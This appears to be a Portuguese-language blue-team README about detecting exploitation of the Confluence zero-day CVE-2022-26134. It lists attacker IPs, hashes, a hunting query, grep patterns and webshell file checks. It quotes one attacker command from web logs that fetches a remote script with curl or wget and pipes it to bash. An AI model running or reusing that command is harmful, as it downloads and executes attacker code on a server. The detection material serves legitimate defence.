
Este repositório trata sobre Exploração de Zero-Day do Atlassian Confluence, seu ponto de vista de defesa e análise sob a perspectiva de SecOps ou Blue Team.
Este repositório aborda a exploração de dia zero do Atlassian Confluence, sob o ponto de vista de defesa e análise de um SecOps ou Blue Team
Durante o fim de semana do Memorial Day nos Estados Unidos, a Volexity conduziu uma investigação de resposta a incidentes envolvendo dois servidores web voltados para a Internet pertencentes a um de seus clientes que estavam executando o software Atlassian Confluence Server. A investigação começou após a detecção de atividade suspeita nos hosts, que incluía webshells JSP sendo gravados em disco. A Volexity imediatamente usou o Volexity Surge Collect Pro para coletar memória do sistema e arquivos-chave dos sistemas Confluence Server para análise. Após uma revisão aprofundada dos dados coletados, a Volexity conseguiu determinar que o comprometimento do servidor resultou de um invasor lançando um exploit para obter execução remota de código. Posteriormente, a Volexity conseguiu recriar esse exploit e identificar uma vulnerabilidade de dia zero que afeta versões totalmente atualizadas do Confluence Server.
Após a descoberta e verificação dessa vulnerabilidade, a Volexity contatou a Atlassian para relatar os detalhes relevantes em 31 de maio de 2022. A Atlassian desde então confirmou a vulnerabilidade e posteriormente atribuiu o problema ao CVE-2022-26134. Foi confirmado que funciona nas versões atuais do Confluence Server e Data Center.
Consulte os detalhes técnicos AQUI
154.146.34.145
154.16.105.147
156.146.34.46
156.146.34.52
156.146.34.9
156.146.56.136
198.147.22.148
198.147.22.148
221.178.126.244
45.43.19.91
59.163.248.170
64.64.228.239
66.115.182.102
66.115.182.111
67.149.61.16
98.32.230.38
193.106.191.48
f39b321472b8dac2452e4c0bc687cb5aa401ac6687520fdc9fd523a17477886d
f8df4dd46f02dc86d37d46cf4793e036
DeviceProcessEvents
| where InitiatingProcessFileName has_any( @"tomcat9.exe")
//| where ProcessCommandLine has_any (@"whoami.exe",@"nslookup.exe")
${ em (diretório de instalação)/logs/*.logegrep -a -i -f pattern.txt *.log onde pattern.txt deve ser salvo como ${ ou apenas tente grep "\${" caminho do arquivo de log ou tente grep "$%7B" caminho do arquivo de logfindstr -i noop.jsp "logpath"$jspname_jsp.java em confluence_install_dir/work/Standalone/. Por exemplo, se você encontrar um shell chamado hack.jsp, você deve ver hack_jsp.java. Se não encontrar hack.jsp mais no disco, tente pivotar nos logs web para procurar acesso a ele. Isso dará o significado de quando foi acessado/excluído.process where event='CreateProcess' and parent_process_path='/opt/atlassian/confluence/jre/bin/java' and process_user_name='confluence' pode ajudar a identificar conforme descrito por David AQUIbash -c '(curl -s 195.2.79[.]26/cf.sh||wget -q -O- 195.2.79[.]26/cf.sh)|bash nos logs web./admin/findspaceattachments.jsp
./admin/cluster/hashclustername.jsp
./admin/default.jsp
./classpath.jsp
./errors/notfound.jsp
./500page.jsp
./errors.jsp
./noop.jsp
portanto, procure por novos arquivos criados que não estejam listados acima
.java no diretório ./confluence/org/apache/jsp/ que não deveriam estar lá.java->bash->python->bash